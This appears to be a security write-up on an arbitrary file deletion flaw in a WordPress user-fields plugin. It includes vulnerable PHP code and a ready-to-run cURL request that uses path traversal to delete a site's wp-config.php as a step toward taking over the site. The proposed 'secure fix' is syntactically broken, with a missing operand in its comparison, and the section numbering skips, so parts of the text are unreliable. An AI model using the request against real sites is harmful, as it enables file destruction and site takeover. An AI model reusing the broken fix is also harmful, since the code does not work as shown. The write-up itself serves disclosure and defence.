CVE-2024-11150 - Arbitrary File Deletion in WordPress User Extra Fields Plugin (Up to 16.6) — Exploit Details, Code & Deep Dive

Summary:
CVE-2024-11150 is a critical vulnerability in the "User Extra Fields" WordPress plugin (versions up to and including 16.6). Due to poor validation in the delete_tmp_uploaded_file() function, an unauthenticated attacker can delete any file on the server. This can result in a full site compromise, especially if a key file like wp-config.php is removed.

1. What Is The User Extra Fields Plugin?

The User Extra Fields plugin lets WordPress site owners add custom user fields to registration and profile forms. It’s popular for sites with custom user management needs.

Link to plugin:
https://wordpress.org/plugins/user-extra-fields/

2. Vulnerability Details (CVE-2024-11150)

At the heart of the issue lies the delete_tmp_uploaded_file() function. It is supposed to delete *only* temporary uploaded files, but it doesn't strictly check the file path. As a result, attackers may specify any file path, leading the function to delete files outside the designated temp directory.

Vulnerability Type: Arbitrary File Deletion
Authentication Required: None (Unauthenticated)
Severity: Critical
Versions Affected: All up to 16.6

Key Problem

The function trusts user input about what file to delete.

Here’s a simplified version of the problematic code

// Inside user-extra-fields/libs/ajax.php
function delete_tmp_uploaded_file() {
    $file = $_POST['file'];
    if (file_exists($file)) {
        unlink($file);
        echo 'Deleted: ' . htmlspecialchars($file);
    }
    exit;
}

Notice that $file (supplied by the user) is not sanitized or checked for valid directory or path.

Attack Scenario

1. Attacker discovers endpoint (e.g., /wp-admin/admin-ajax.php?action=delete_tmp_uploaded_file).
2. Attacker crafts a POST request with the parameter file set to /var/www/html/wp-config.php (or equivalent).
3. The plugin runs unlink('/var/www/html/wp-config.php'), deleting the site’s config file.

Now, the next visitor triggers installation mode, allowing attacker to take over the site or potentially upload their own code.

Example Exploit (cURL)

curl -X POST \
  -d "action=delete_tmp_uploaded_file" \
  -d "file=../../../../wp-config.php" \
  https://victim-site.com/wp-admin/admin-ajax.php

Deleting critical files (like wp-config.php) puts WordPress in setup mode.

- Attacker can re-install, connect to their own DB, or upload a malicious plugin/theme.

6. References and Official Resources

- Wordfence Advisory & Details
- WPScan Entry: CVE-2024-11150
- Plugin page (WordPress.org)
- CVE Record

Disable or remove the plugin until a patch is available.

- Prevent public access to /wp-admin/admin-ajax.php where possible.

A secure fix should only allow files within a specific directory

function delete_tmp_uploaded_file() {
    $file = $_POST['file'];
    $tmp_dir = '/path/to/wp-content/uploads/user-extra-fields/tmp/';
    $realTmp = realpath($tmp_dir);
    $realFile = realpath($file);

    if (strpos($realFile, $realTmp) ===  && file_exists($realFile)) {
        unlink($realFile);
        echo 'Deleted: ' . htmlspecialchars($realFile);
    }
    exit;
}

This makes sure only files inside the intended temp dir can be deleted.

8. Conclusion

CVE-2024-11150 is a perfect example of how neglecting input validation leads to critical security holes. Arbitrary file deletion can escalate to remote code execution and total site takeover. If you use the User Extra Fields plugin, disable it and update ASAP.

Stay safe!

If you found this writeup helpful, consider sharing it with others and keep your plugins updated.

Timeline

Published on: 11/13/2024 05:15:12 UTC
Last modified on: 11/13/2024 17:01:16 UTC